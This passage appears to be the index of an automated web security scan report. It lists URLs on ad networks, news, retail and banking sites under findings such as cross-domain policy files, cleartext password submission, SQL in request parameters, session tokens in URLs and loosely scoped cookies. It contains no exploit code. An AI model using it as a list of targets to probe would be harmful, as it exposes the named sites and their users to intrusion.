4.2. http://a.tribalfusion.com/crossdomain.xml

4.3. http://a1.interclick.com/crossdomain.xml

4.4. http://a1.sndcdn.com/crossdomain.xml

4.5. http://action.mathtag.com/crossdomain.xml

4.6. http://ad.doubleclick.net/crossdomain.xml

4.7. http://admeld.adnxs.com/crossdomain.xml

4.8. http://ads.pointroll.com/crossdomain.xml

4.9. http://ads.undertone.com/crossdomain.xml

4.10. http://adserver.adtechus.com/crossdomain.xml

4.11. http://adsfac.us/crossdomain.xml

4.12. http://altfarm.mediaplex.com/crossdomain.xml

4.13. http://amch.questionmarket.com/crossdomain.xml

4.14. http://ar.voicefive.com/crossdomain.xml

4.15. http://audit.303br.net/crossdomain.xml

4.16. http://b.scorecardresearch.com/crossdomain.xml

4.17. http://b.voicefive.com/crossdomain.xml

4.18. http://b3.mookie1.com/crossdomain.xml

4.19. http://bs.serving-sys.com/crossdomain.xml

4.20. http://c.betrad.com/crossdomain.xml

4.21. http://c7.zedo.com/crossdomain.xml

4.22. http://cache.specificmedia.com/crossdomain.xml

4.23. http://cas.criteo.com/crossdomain.xml

4.24. http://cctrkom.creditcards.com/crossdomain.xml

4.25. http://cdn.interclick.com/crossdomain.xml

4.26. http://cdn.turn.com/crossdomain.xml

4.27. http://cdn5.tribalfusion.com/crossdomain.xml

4.28. http://core.insightexpressai.com/crossdomain.xml

4.29. http://cts-log.channelintelligence.com/crossdomain.xml

4.30. http://d7.zedo.com/crossdomain.xml

4.31. http://dar.youknowbest.com/crossdomain.xml

4.32. http://dis.ny.us.criteo.com/crossdomain.xml

4.33. http://ds.serving-sys.com/crossdomain.xml

4.34. http://ebay.adnxs.com/crossdomain.xml

4.35. http://external.ak.fbcdn.net/crossdomain.xml

4.36. http://fls.doubleclick.net/crossdomain.xml

4.37. http://fw.adsafeprotected.com/crossdomain.xml

4.38. http://homedepot.ugc.bazaarvoice.com/crossdomain.xml

4.39. http://i1.sndcdn.com/crossdomain.xml

4.40. http://ib.adnxs.com/crossdomain.xml

4.41. http://ic.nexac.com/crossdomain.xml

4.42. http://idcs.interclick.com/crossdomain.xml

4.43. http://img.mediaplex.com/crossdomain.xml

4.44. http://impl.ackak.com/crossdomain.xml

4.45. http://js.revsci.net/crossdomain.xml

4.46. http://l2.betrad.com/crossdomain.xml

4.47. http://log30.doubleverify.com/crossdomain.xml

4.48. http://media2.legacy.com/crossdomain.xml

4.49. http://metrics.citibank.com/crossdomain.xml

4.50. http://oimg.nbcuni.com/crossdomain.xml

4.51. http://om.dowjoneson.com/crossdomain.xml

4.52. http://p.addthis.com/crossdomain.xml

4.53. http://pbid.pro-market.net/crossdomain.xml

4.54. http://pix04.revsci.net/crossdomain.xml

4.55. http://pixel.adsafeprotected.com/crossdomain.xml

4.56. http://pixel.everesttech.net/crossdomain.xml

4.57. http://pixel.invitemedia.com/crossdomain.xml

4.58. http://pixel.quantserve.com/crossdomain.xml

4.59. http://puma.vizu.com/crossdomain.xml

4.60. http://r.turn.com/crossdomain.xml

4.61. http://radiumone.com/crossdomain.xml

4.62. http://reviews.homedepot.com/crossdomain.xml

4.63. http://rmd.atdmt.com/crossdomain.xml

4.64. http://rp.gwallet.com/crossdomain.xml

4.65. http://rs.gwallet.com/crossdomain.xml

4.66. http://secure-us.imrworldwide.com/crossdomain.xml

4.67. http://segment-pixel.invitemedia.com/crossdomain.xml

4.68. http://spe.atdmt.com/crossdomain.xml

4.69. http://sync.mathtag.com/crossdomain.xml

4.70. http://t.mookie1.com/crossdomain.xml

4.71. http://tags.bluekai.com/crossdomain.xml

4.72. http://tf.nexac.com/crossdomain.xml

4.73. http://ttwbs.channelintelligence.com/crossdomain.xml

4.74. http://va.px.invitemedia.com/crossdomain.xml

4.75. http://wasc.homedepot.com/crossdomain.xml

4.76. http://www.creditcards.com/crossdomain.xml

4.77. http://www.wunderground.com/crossdomain.xml

4.78. http://www2.sesamestats.com/crossdomain.xml

4.79. http://adadvisor.net/crossdomain.xml

4.80. http://ads.bridgetrack.com/crossdomain.xml

4.81. http://ads.cleveland.com/crossdomain.xml

4.82. http://ads.nj.com/crossdomain.xml

4.83. http://ads.oregonlive.com/crossdomain.xml

4.84. http://ads1.msn.com/crossdomain.xml

4.85. http://adx.g.doubleclick.net/crossdomain.xml

4.86. http://check4.facebook.com/crossdomain.xml

4.87. http://check6.facebook.com/crossdomain.xml

4.88. http://edge.sharethis.com/crossdomain.xml

4.89. http://feeds.bbci.co.uk/crossdomain.xml

4.90. http://googleads.g.doubleclick.net/crossdomain.xml

4.91. http://login.dotomi.com/crossdomain.xml

4.92. http://media.cnbc.com/crossdomain.xml

4.93. http://newsrss.bbc.co.uk/crossdomain.xml

4.94. http://oc.creditcards.com/crossdomain.xml

4.95. http://online.wsj.com/crossdomain.xml

4.96. http://optimized-by.rubiconproject.com/crossdomain.xml

4.97. http://p.opt.fimserve.com/crossdomain.xml

4.98. http://pagead2.googlesyndication.com/crossdomain.xml

4.99. http://quote.cnbc.com/crossdomain.xml

4.100. http://rd.rlcdn.com/crossdomain.xml

4.101. http://rover.ebay.com/crossdomain.xml

4.102. http://search.cnbc.com/crossdomain.xml

4.103. http://soundcloud.com/crossdomain.xml

4.104. https://soundcloud.com/crossdomain.xml

4.105. http://static.ak.fbcdn.net/crossdomain.xml

4.106. http://w.sharethis.com/crossdomain.xml

4.107. http://www.cnbc.com/crossdomain.xml

4.108. http://www.facebook.com/crossdomain.xml

4.109. http://www.homedepot.com/crossdomain.xml

4.110. http://www.res-x.com/crossdomain.xml

4.111. http://www.wtp101.com/crossdomain.xml

4.112. http://citi.bridgetrack.com/crossdomain.xml

4.113. http://creditcards.citicards.com/crossdomain.xml

4.114. http://ilslaunch.app2.hubspot.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

5.2. http://ads.pointroll.com/clientaccesspolicy.xml

5.3. http://ads1.msn.com/clientaccesspolicy.xml

5.4. http://b.scorecardresearch.com/clientaccesspolicy.xml

5.5. http://b.voicefive.com/clientaccesspolicy.xml

5.6. http://cctrkom.creditcards.com/clientaccesspolicy.xml

5.7. http://metrics.citibank.com/clientaccesspolicy.xml

5.8. http://oimg.nbcuni.com/clientaccesspolicy.xml

5.9. http://om.dowjoneson.com/clientaccesspolicy.xml

5.10. http://rmd.atdmt.com/clientaccesspolicy.xml

5.11. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

5.12. http://spe.atdmt.com/clientaccesspolicy.xml

5.13. http://wasc.homedepot.com/clientaccesspolicy.xml

5.14. http://media.cnbc.com/clientaccesspolicy.xml

5.15. http://www.cnbc.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html

6.2. http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html

6.3. http://online.wsj.com/home-page

7. SQL statement in request parameter

7.1. https://soundcloud.com/login

7.2. http://www.creditcards.com/oc/

7.3. http://www.nutter.com/attorneys.php

8. SSL cookie without secure flag set

9. Session token in URL

9.1. http://l.sharethis.com/pview

9.2. http://www.facebook.com/extern/login_status.php

9.3. http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay

10. Cookie scoped to parent domain

10.1. http://cts-log.channelintelligence.com/

10.2. http://login.dotomi.com/ucm/UCMController

10.3. http://pixel.everesttech.net/1688/i

10.4. http://t.mookie1.com/t/v1/imp

10.5. http://ttwbs.channelintelligence.com/

10.6. http://www.creditcards.com/xtrack.php

10.7. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation

10.8. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

10.9. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

10.10. http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay

10.11. http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation

10.12. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate

10.13. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemAddService

10.14. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplay

10.15. http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService

10.16. http://www.ilslaunch.com/skyterra-1-mission-control

10.17. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

10.18. http://a.amxdt.com/px/

10.19. http://a.rfihub.com/cm

10.20. http://a.rfihub.com/cm

10.21. http://a.rfihub.com/sed

10.22. http://a.rfihub.com/tk.gif

10.23. http://a.tribalfusion.com/i.match

10.24. http://a.tribalfusion.com/j.ad

10.25. http://a1.interclick.com/ColDta.aspx

10.26. http://a1.interclick.com/Segment.aspx

10.27. http://admeld.adnxs.com/usersync

10.28. http://ads.revsci.net/adserver/ako

10.29. http://ads.revsci.net/adserver/ako

10.30. http://ads.revsci.net/adserver/ako

10.31. http://ads.undertone.com/ajs.php

10.32. http://ak1.abmr.net/is/ads.undertone.com

10.33. http://ak1.abmr.net/is/r1-ads.ace.advertising.com

10.34. http://ak1.abmr.net/is/tag.admeld.com

10.35. http://ak1.abmr.net/is/www.homedepot.com

10.36. http://amch.questionmarket.com/adsc/d844890/33/39959888/decide.php

10.37. http://amch.questionmarket.com/adsc/d844890/33/39959895/decide.php

10.38. http://amch.questionmarket.com/adsc/d844890/33/39959897/decide.php

10.39. http://api.bizographics.com/v1/profile.json

10.40. http://api.bizographics.com/v1/profile.redirect

10.41. http://ar.voicefive.com/b/wc_beacon.pli

10.42. http://ar.voicefive.com/bmx3/broker.pli

10.43. http://ar.voicefive.com/bmx3/broker.pli

10.44. http://ar.voicefive.com/bmx3/broker.pli

10.45. http://b.scorecardresearch.com/b

10.46. http://b.scorecardresearch.com/r

10.47. http://b.voicefive.com/b

10.48. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.49. http://c7.zedo.com/img/bh.gif

10.50. http://cas.criteo.com/delivery/afr.php

10.51. http://click.linksynergy.com/fs-bin/click

10.52. http://d7.zedo.com/img/bh.gif

10.53. http://dis.ny.us.criteo.com/dis/dis.aspx

10.54. http://ebay.adnxs.com/ttj

10.55. http://ib.adnxs.com/getuid

10.56. http://ib.adnxs.com/getuidu

10.57. http://ib.adnxs.com/mapuid

10.58. http://ib.adnxs.com/ptj

10.59. http://ib.adnxs.com/pxj

10.60. http://ib.adnxs.com/seg

10.61. http://ib.adnxs.com/setuid

10.62. http://idcs.interclick.com/Segment.aspx

10.63. http://image2.pubmatic.com/AdServer/Pug

10.64. http://imp.constantcontact.com/imp/cmp.jsp

10.65. http://js.revsci.net/common/pcx.js

10.66. http://js.revsci.net/gateway/gw.js

10.67. http://leadback.advertising.com/adcedge/lb

10.68. http://map.media6degrees.com/orbserv/hbpix

10.69. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1049999702@x15

10.70. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1061037567@x15

10.71. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1071006765@x15

10.72. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1102913360@x15

10.73. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1127856009@x15

10.74. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1245329572@x15

10.75. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1275267067@x15

10.76. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1286122757@x15

10.77. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1461570951@x15

10.78. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1584817229@x15

10.79. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1608535405@x15

10.80. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1646228634@x15

10.81. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1662691403@x15

10.82. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1729780354@x15

10.83. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1767572891@x15

10.84. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1809071643@x15

10.85. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1837611586@x15

10.86. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1851473663@x15

10.87. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1933034357@x15

10.88. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1938155974@x15

10.89. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1059242575@Top1

10.90. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1091147736@Top1

10.91. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1098629905@Top1

10.92. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1187700357@Top1

10.93. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1236153237@Top1

10.94. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1319798396@Top1

10.95. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1359015114@Top1

10.96. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1443368947@Top1

10.97. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1512823451@Top1

10.98. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1515366038@Top1

10.99. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1551279173@Top1

10.100. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1704218535@Top1

10.101. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1726433512@Top1

10.102. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1777416209@Top1

10.103. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1815229995@Top1

10.104. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1861592040@Top1

10.105. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1885484252@Top1

10.106. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1930646721@Top1

10.107. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js

10.108. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js

10.109. http://optimized-by.rubiconproject.com/a/dk.html

10.110. http://optimized-by.rubiconproject.com/a/dk.html

10.111. http://optimized-by.rubiconproject.com/a/dk.js

10.112. http://optimized-by.rubiconproject.com/a/dk.js

10.113. http://p.opt.fimserve.com/bht/

10.114. http://pbid.pro-market.net/engine

10.115. http://phoenix.untd.com/TRCK/RGST

10.116. http://pix04.revsci.net/D10889/a1/0/3/0.gif

10.117. http://pix04.revsci.net/D10889/a1/0/3/0.gif

10.118. http://pix04.revsci.net/D10889/a1/0/3/0.gif

10.119. http://pix04.revsci.net/E06560/b3/0/3/noscript.gif

10.120. http://pix04.revsci.net/G07608/a4/0/0/pcx.js

10.121. http://pix04.revsci.net/I10985/b3/0/3/1008211/111571878.js

10.122. http://pix04.revsci.net/I10985/b3/0/3/1008211/118546994.js

10.123. http://pix04.revsci.net/I10985/b3/0/3/1008211/128597095.js

10.124. http://pix04.revsci.net/I10985/b3/0/3/1008211/149141737.js

10.125. http://pix04.revsci.net/I10985/b3/0/3/1008211/152539728.js

10.126. http://pix04.revsci.net/I10985/b3/0/3/1008211/153416135.js

10.127. http://pix04.revsci.net/I10985/b3/0/3/1008211/167338616.js

10.128. http://pix04.revsci.net/I10985/b3/0/3/1008211/174739392.js

10.129. http://pix04.revsci.net/I10985/b3/0/3/1008211/178674175.js

10.130. http://pix04.revsci.net/I10985/b3/0/3/1008211/204994515.js

10.131. http://pix04.revsci.net/I10985/b3/0/3/1008211/20510025.js

10.132. http://pix04.revsci.net/I10985/b3/0/3/1008211/206078584.js

10.133. http://pix04.revsci.net/I10985/b3/0/3/1008211/209054641.js

10.134. http://pix04.revsci.net/I10985/b3/0/3/1008211/210088310.js

10.135. http://pix04.revsci.net/I10985/b3/0/3/1008211/235290478.js

10.136. http://pix04.revsci.net/I10985/b3/0/3/1008211/242178359.js

10.137. http://pix04.revsci.net/I10985/b3/0/3/1008211/252539645.js

10.138. http://pix04.revsci.net/I10985/b3/0/3/1008211/266352153.js

10.139. http://pix04.revsci.net/I10985/b3/0/3/1008211/266715150.js

10.140. http://pix04.revsci.net/I10985/b3/0/3/1008211/266829410.js

10.141. http://pix04.revsci.net/I10985/b3/0/3/1008211/271822828.js

10.142. http://pix04.revsci.net/I10985/b3/0/3/1008211/298241288.js

10.143. http://pix04.revsci.net/I10985/b3/0/3/1008211/306033605.js

10.144. http://pix04.revsci.net/I10985/b3/0/3/1008211/31221949.js

10.145. http://pix04.revsci.net/I10985/b3/0/3/1008211/319879025.js

10.146. http://pix04.revsci.net/I10985/b3/0/3/1008211/321200067.js

10.147. http://pix04.revsci.net/I10985/b3/0/3/1008211/325815715.js

10.148. http://pix04.revsci.net/I10985/b3/0/3/1008211/329181290.js

10.149. http://pix04.revsci.net/I10985/b3/0/3/1008211/351391247.js

10.150. http://pix04.revsci.net/I10985/b3/0/3/1008211/35234473.js

10.151. http://pix04.revsci.net/I10985/b3/0/3/1008211/352735390.js

10.152. http://pix04.revsci.net/I10985/b3/0/3/1008211/400010602.js

10.153. http://pix04.revsci.net/I10985/b3/0/3/1008211/4030732.js

10.154. http://pix04.revsci.net/I10985/b3/0/3/1008211/411814556.js

10.155. http://pix04.revsci.net/I10985/b3/0/3/1008211/434601309.js

10.156. http://pix04.revsci.net/I10985/b3/0/3/1008211/448263760.js

10.157. http://pix04.revsci.net/I10985/b3/0/3/1008211/450083429.js

10.158. http://pix04.revsci.net/I10985/b3/0/3/1008211/469061960.js

10.159. http://pix04.revsci.net/I10985/b3/0/3/1008211/47135208.js

10.160. http://pix04.revsci.net/I10985/b3/0/3/1008211/474207582.js

10.161. http://pix04.revsci.net/I10985/b3/0/3/1008211/48193081.js

10.162. http://pix04.revsci.net/I10985/b3/0/3/1008211/482745036.js

10.163. http://pix04.revsci.net/I10985/b3/0/3/1008211/518130278.js

10.164. http://pix04.revsci.net/I10985/b3/0/3/1008211/541993060.js

10.165. http://pix04.revsci.net/I10985/b3/0/3/1008211/572738137.js

10.166. http://pix04.revsci.net/I10985/b3/0/3/1008211/579855884.js

10.167. http://pix04.revsci.net/I10985/b3/0/3/1008211/602675862.js

10.168. http://pix04.revsci.net/I10985/b3/0/3/1008211/603496051.js

10.169. http://pix04.revsci.net/I10985/b3/0/3/1008211/609031637.js

10.170. http://pix04.revsci.net/I10985/b3/0/3/1008211/609523113.js

10.171. http://pix04.revsci.net/I10985/b3/0/3/1008211/61287048.js

10.172. http://pix04.revsci.net/I10985/b3/0/3/1008211/616476492.js

10.173. http://pix04.revsci.net/I10985/b3/0/3/1008211/623863779.js

10.174. http://pix04.revsci.net/I10985/b3/0/3/1008211/632139984.js

10.175. http://pix04.revsci.net/I10985/b3/0/3/1008211/656764106.js

10.176. http://pix04.revsci.net/I10985/b3/0/3/1008211/663059389.js

10.177. http://pix04.revsci.net/I10985/b3/0/3/1008211/677906397.js

10.178. http://pix04.revsci.net/I10985/b3/0/3/1008211/678221040.js

10.179. http://pix04.revsci.net/I10985/b3/0/3/1008211/697771504.js

10.180. http://pix04.revsci.net/I10985/b3/0/3/1008211/700812667.js

10.181. http://pix04.revsci.net/I10985/b3/0/3/1008211/7130573.js

10.182. http://pix04.revsci.net/I10985/b3/0/3/1008211/715243108.js

10.183. http://pix04.revsci.net/I10985/b3/0/3/1008211/719321222.js

10.184. http://pix04.revsci.net/I10985/b3/0/3/1008211/727551731.js

10.185. http://pix04.revsci.net/I10985/b3/0/3/1008211/743305953.js

10.186. http://pix04.revsci.net/I10985/b3/0/3/1008211/743306396.js

10.187. http://pix04.revsci.net/I10985/b3/0/3/1008211/747675233.js

10.188. http://pix04.revsci.net/I10985/b3/0/3/1008211/750853358.js

10.189. http://pix04.revsci.net/I10985/b3/0/3/1008211/759659174.js

10.190. http://pix04.revsci.net/I10985/b3/0/3/1008211/773834418.js

10.191. http://pix04.revsci.net/I10985/b3/0/3/1008211/778726069.js

10.192. http://pix04.revsci.net/I10985/b3/0/3/1008211/783069022.js

10.193. http://pix04.revsci.net/I10985/b3/0/3/1008211/791107298.js

10.194. http://pix04.revsci.net/I10985/b3/0/3/1008211/811937771.js

10.195. http://pix04.revsci.net/I10985/b3/0/3/1008211/812722846.js

10.196. http://pix04.revsci.net/I10985/b3/0/3/1008211/814191239.js

10.197. http://pix04.revsci.net/I10985/b3/0/3/1008211/821864121.js

10.198. http://pix04.revsci.net/I10985/b3/0/3/1008211/833474274.js

10.199. http://pix04.revsci.net/I10985/b3/0/3/1008211/837302366.js

10.200. http://pix04.revsci.net/I10985/b3/0/3/1008211/851863014.js

10.201. http://pix04.revsci.net/I10985/b3/0/3/1008211/85990292.js

10.202. http://pix04.revsci.net/I10985/b3/0/3/1008211/870883424.js

10.203. http://pix04.revsci.net/I10985/b3/0/3/1008211/8734315.js

10.204. http://pix04.revsci.net/I10985/b3/0/3/1008211/896562366.js

10.205. http://pix04.revsci.net/I10985/b3/0/3/1008211/91490024.js

10.206. http://pix04.revsci.net/I10985/b3/0/3/1008211/922092432.js

10.207. http://pix04.revsci.net/I10985/b3/0/3/1008211/927091024.js

10.208. http://pix04.revsci.net/I10985/b3/0/3/1008211/92794223.js

10.209. http://pix04.revsci.net/I10985/b3/0/3/1008211/944603151.js

10.210. http://pix04.revsci.net/I10985/b3/0/3/1008211/948985352.js

10.211. http://pix04.revsci.net/I10985/b3/0/3/1008211/959799423.js

10.212. http://pix04.revsci.net/I10985/b3/0/3/1008211/961894975.js

10.213. http://pix04.revsci.net/I10985/b3/0/3/1008211/97296821.js

10.214. http://pix04.revsci.net/I10985/b3/0/3/1008211/978202705.js

10.215. http://pixel.quantserve.com/pixel

10.216. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

10.217. http://pixel.quantserve.com/seg/p-9eJ8k4iSzux46.js

10.218. http://pixel.rubiconproject.com/di.php

10.219. http://pixel.rubiconproject.com/tap.php

10.220. http://pixel.rubiconproject.com/tap.php

10.221. http://pixel.rubiconproject.com/tap.php

10.222. http://r.turn.com/r/beacon

10.223. http://r.turn.com/server/pixel.htm

10.224. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=16893018/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.225. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=22319790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.226. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=33615280/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.227. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=43472790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.228. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=46970102/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.229. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=61218373/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.230. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=63221864/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.231. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=63734715/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.232. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=74200963/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.233. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=74864635/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.234. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=75388116/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.235. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=76474621/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.236. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=83985251/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.237. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=90208788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.238. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=90827809/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.239. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=91953648/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.240. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=9352727/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.241. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=12937368/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.242. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=16141575/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.243. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=1625138/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

